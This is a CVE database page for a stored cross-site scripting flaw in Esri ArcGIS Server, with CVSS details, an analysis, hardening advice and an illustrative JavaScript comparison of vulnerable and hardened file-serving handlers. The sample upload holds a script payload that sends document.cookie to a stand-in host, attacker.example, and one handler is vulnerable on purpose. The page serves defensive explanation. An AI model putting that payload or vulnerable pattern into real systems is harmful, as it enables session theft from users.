CVE-2025-67709

MEDIUM 6.1 / 10.0
Published: December 31, 2025 at 11:15 PM
Modified: January 6, 2026 at 07:04 PM
Source: psirt@esri.com

Vulnerability Description

There is a stored cross site scripting issue in Esri ArcGIS Server 11.4 and earlier on Windows and Linux that in some configurations allows a remote unauthenticated attacker to store files that contain malicious code that may execute in the context of a victim’s browser.

CVSS Metrics

Base Score
6.1
Severity
MEDIUM
Vector String
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Weaknesses (CWE)

Source: psirt@esri.com

AI Security Analysis

01 // Technical Summary

Esri ArcGIS Server 11.4 and earlier, on Windows and Linux, contains a stored cross-site scripting (XSS) flaw: in some configurations a remote, unauthenticated attacker can store a file containing script on the server, and that script may later execute in the browser of a user who opens it. The impact is confined to the victim's browser context. The CVSS vector rates confidentiality and integrity impact as Low, availability as None, and requires user interaction, so the realistic outcome is theft of session tokens or data visible to the victim and actions performed with the victim's privileges, not arbitrary code execution on the server itself. The changed scope (S:C) reflects that the vulnerable component is the server while the script runs under a different security authority, the victim's browser.

02 // Vulnerability Mechanism

Step 1: Payload creation. The attacker prepares a file whose content a browser will interpret as HTML or script (for example an HTML or SVG document, or any file whose body is parsed as a document when served inline). The script is written to run in the victim's browser: read cookies or tokens the page can access, issue requests as the victim, or redirect the victim.

Step 2: File storage by the attacker. The attacker uses a store-file function of ArcGIS Server that, in the affected configurations, is reachable without authentication (the vector has PR:N). The advisory does not name the specific endpoint or configuration, so which path is exposed depends on the instance.

Step 3: Retention on the server. The server accepts and retains the file without rejecting or neutralising its active content.

Step 4: Victim interaction. A legitimate user opens a page or resource in ArcGIS Server that displays or serves the stored file (UI:R in the vector: the victim must open it).

Step 5: Execution in the victim's browser. Because the file is delivered in a way the browser treats as a document in the server's origin rather than as inert data, the embedded script executes with the victim's session and the server's origin privileges.

03 // Deep Technical Analysis

Per the advisory, the root cause is that the server stores attacker-supplied file content and later serves it in a way that a browser interprets as HTML or script within the ArcGIS Server origin. That is a failure of validation at storage time and, more decisively, of safe delivery at retrieval time: the content type, disposition and encoding applied when the file is served are what determine whether the browser treats it as a document or as inert data. The advisory does not identify the affected endpoint, the file types involved or the configurations that expose the store-file function to unauthenticated callers, and this analysis does not speculate beyond it.

Remediation: consult Esri's security advisory for CVE-2025-67709 (source: psirt@esri.com) for the patched releases; this page does not list them.

Exposure check: because the vector has PR:N, confirm whether any ArcGIS Server instance exposes a path that accepts files without authentication. Instances that require authentication for every such path reduce the flaw to one exploitable only by authenticated users, which the vector does not cover.

Defence in depth for any service that re-serves user-supplied files, as a complement to the patch rather than a substitute: serve such files from a separate origin or with Content-Disposition: attachment, set X-Content-Type-Options: nosniff, derive Content-Type from a server-side allowlist rather than from the upload, and attach a restrictive Content-Security-Policy to the file-serving responses.

Detection: review access logs for file-storage requests from unauthenticated sources, and inventory stored objects whose extension (.html, .htm, .svg, .xml, .xhtml) or content would render as a document when served inline.
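The following is an added illustration, not Esri code and not a reproduction of the ArcGIS Server endpoint, which the advisory does not name. It models the generic pattern the analysis describes: a store-and-serve handler that echoes the uploader's content type inline (the stored-XSS sink), the same handler hardened with an authentication check, an allowlisted content type, attachment disposition, nosniff and a restrictive CSP, and a simplified check of whether a browser would treat a response as active content. The upload object, file names and header model are constructed for the example; the functions operate on plain objects so the block runs without a network.

```javascript
'use strict';

// Constructed sample "upload" as an unauthenticated client might send it.
// The Content-Type header is attacker-controlled, like the body.
const maliciousUpload = {
  filename: 'legend.html',
  contentType: 'text/html',
  body: '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>',
  authenticated: false,
};

// --- Vulnerable pattern -------------------------------------------------
// Stores whatever arrives and later serves it inline with the client's own
// Content-Type, so the browser parses the body as HTML in the server's origin.
function serveStoredFileVulnerable(upload) {
  return {
    status: 200,
    headers: {
      'Content-Type': upload.contentType,
      'Content-Disposition': `inline; filename="${upload.filename}"`,
    },
    body: upload.body,
  };
}

// --- Hardened pattern ---------------------------------------------------
// Extension-to-type allowlist of formats a browser never executes as a
// document. Anything else is served as an opaque byte stream.
const SAFE_TYPES = new Map([
  ['.csv', 'text/csv'],
  ['.json', 'application/json'],
  ['.png', 'image/png'],
  ['.jpg', 'image/jpeg'],
]);

function serveStoredFileHardened(upload) {
  // Storage and retrieval require an authenticated caller (the advisory's
  // vector has PR:N; this is the precondition the hardened path removes).
  if (!upload.authenticated) {
    return { status: 401, headers: {}, body: '' };
  }
  const ext = (upload.filename.match(/\.[^.]+$/) || [''])[0].toLowerCase();
  // Never trust the client's Content-Type; derive it server-side.
  const type = SAFE_TYPES.get(ext) || 'application/octet-stream';
  // Keep the filename parameter from breaking out of its quotes.
  const safeName = upload.filename.replace(/[^A-Za-z0-9._-]/g, '_');
  return {
    status: 200,
    headers: {
      'Content-Type': type,
      'X-Content-Type-Options': 'nosniff',
      'Content-Disposition': `attachment; filename="${safeName}"`,
      // Even if something is rendered, it may load nothing and runs in a
      // sandboxed (opaque) origin rather than the server's.
      'Content-Security-Policy': "default-src 'none'; sandbox",
    },
    body: upload.body,
  };
}

// --- Check: would a browser treat this response as active content? --------
// Simplified model (an assumption for this example, not a full browser):
// a 200 response served inline with a document-family type runs script.
const ACTIVE_TYPES = [
  'text/html', 'application/xhtml+xml', 'image/svg+xml', 'text/xml', 'application/xml',
];

function rendersAsActiveContent(res) {
  if (res.status !== 200) return false;
  const type = (res.headers['Content-Type'] || '').split(';')[0].trim().toLowerCase();
  const disposition = (res.headers['Content-Disposition'] || '').trim().toLowerCase();
  if (disposition.startsWith('attachment')) return false;
  return ACTIVE_TYPES.includes(type);
}

// Demo: the vulnerable handler hands the attacker's HTML to the browser as a
// document; the hardened one refuses the unauthenticated store and, for an
// authenticated one, delivers the same bytes as an inert download.
console.log('vulnerable renders script:',
  rendersAsActiveContent(serveStoredFileVulnerable(maliciousUpload)));
console.log('hardened, unauthenticated status:',
  serveStoredFileHardened(maliciousUpload).status);
console.log('hardened, authenticated renders script:',
  rendersAsActiveContent(serveStoredFileHardened({ ...maliciousUpload, authenticated: true })));
```

The decisive change is on the serving side: once the response is `attachment`, carries `nosniff`, and has a type that does not come from the uploader, the stored bytes are the same but no browser executes them in the application's origin. The authentication check removes the unauthenticated precondition the vector describes; the allowlist is what keeps an `.svg` or `.xhtml` upload from being served as a document.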

CVE-2025-67709 - MEDIUM Severity (6.1) | Free CVE Database | 4nuxd